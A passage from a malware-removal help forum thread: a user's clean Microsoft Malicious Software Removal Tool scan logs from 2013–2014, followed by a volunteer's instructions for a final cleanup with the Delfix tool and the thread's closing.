Microsoft Windows Malicious Software Removal Tool Finished On Thu Sep 12 00:21:45 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.5, October 2013 (build 5.5.9502.0)
Started On Sat Oct 12 17:13:08 2013

Engine: 1.1.9901.0
Signatures: 1.159.530.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Oct 12 17:21:17 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.6, November 2013 (build 5.6.9603.0)
Started On Wed Nov 13 21:18:26 2013

Engine: 1.1.10003.0
Signatures: 1.161.1618.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Nov 13 21:21:36 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.7, December 2013 (build 5.7.9701.0)
Started On Sun Dec 22 02:58:13 2013

Engine: 1.1.10100.0
Signatures: 1.163.1013.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Dec 22 03:00:54 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.8, January 2014 (build 5.8.9803.0)
Started On Mon Jan 20 23:16:55 2014

Engine: 1.1.10201.0
Signatures: 1.165.1273.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Jan 20 23:19:16 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.9, February 2014 (build 5.9.9902.0)
Started On Sat Mar 01 22:25:23 2014

Engine: 1.1.10201.0
Signatures: 1.165.3163.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Mar 01 22:28:37 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.10, March 2014 (build 5.10.10001.0)
Started On Tue Mar 11 20:20:25 2014

Engine: 1.1.10302.0
Signatures: 1.167.1001.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Mar 11 20:24:13 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.11, April 2014 (build 5.11.10100.0)
Started On Mon Apr 21 22:16:22 2014

Engine: 1.1.10401.0
Signatures: 1.169.1258.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Apr 21 22:18:58 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.12, May 2014 (build 5.12.10200.0)
Started On Mon May 19 22:15:49 2014

Engine: 1.1.10502.0
Signatures: 1.173.1305.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon May 19 22:19:02 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.13, June 2014 (build 5.13.10300.0)
Started On Sat Jun 21 06:46:07 2014

Engine: 1.1.10600.0
Signatures: 1.175.1113.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Jun 21 06:50:18 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.14, July 2014 (build 5.14.10402.0)
Started On Sun Jul 13 01:22:59 2014

Engine: 1.1.10701.0
Signatures: 1.177.949.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 13 01:26:03 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.15, August 2014 (build 5.15.10500.0)
Started On Sat Aug 16 10:39:49 2014

Engine: 1.1.10802.0
Signatures: 1.179.1796.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Aug 16 10:42:30 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.16, September 2014 (build 5.16.10602.0)
Started On Tue Sep 16 22:27:56 2014

Engine: 1.1.10904.0
Signatures: 1.183.882.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Sep 16 22:33:55 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Thu Oct 16 16:50:19 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Oct 16 16:56:52 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Wed Oct 29 19:29:49 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Oct 29 19:35:48 2014

Return code: 0 (0x0)

[kevinf80]

Yes logs are looking ok, you should be good to go.... One last tool to clean up..

 

Download "Delfix by Xplode" and save it to your desktop.

 

Or use the following if first link is down:

 

"Delfix link mirror"

 

Double Click to start the program. If you are using Vista or higher, please right-click and choose run as administrator

 

Make Sure the following items are checked:

 

• 
  

    Activate UAC
    Remove disinfection tools
     Create registry backup
    Purge System Restore
    Reset system settings

 

Now click on "Run" and wait patiently until the tool has completed.

 

The tool will create a log when it has completed. We don't need you to post this.

 

Part of the routine will be to create a registry back up with ERUNT,  the back up will be created here:

 

C:\Windows\ERUNT

 

When all is known to be well with your system you can delete that back up folder if you consider it as not needed...

 

Any remnant files/logs from tools we have used can be deleted…

 

Next,

 

Read the following link to fully understand PC security and best practices, you may find it useful....

 

http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/#entry2316629

 

Let me know if we can close out....

 

Thanks,

 

Kevin

[chazzini]

Yes.  Please close.  Thanks a bunch.  Will make a contribution for your help.  Excellent forum.  Can't get better help from my IT folks at work.

[kevinf80]

Thanks for the update and donation, will close out shortly....

 

Take care and surf safe,

 

Kevin....

[AdvancedSetup]

Glad we could help.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!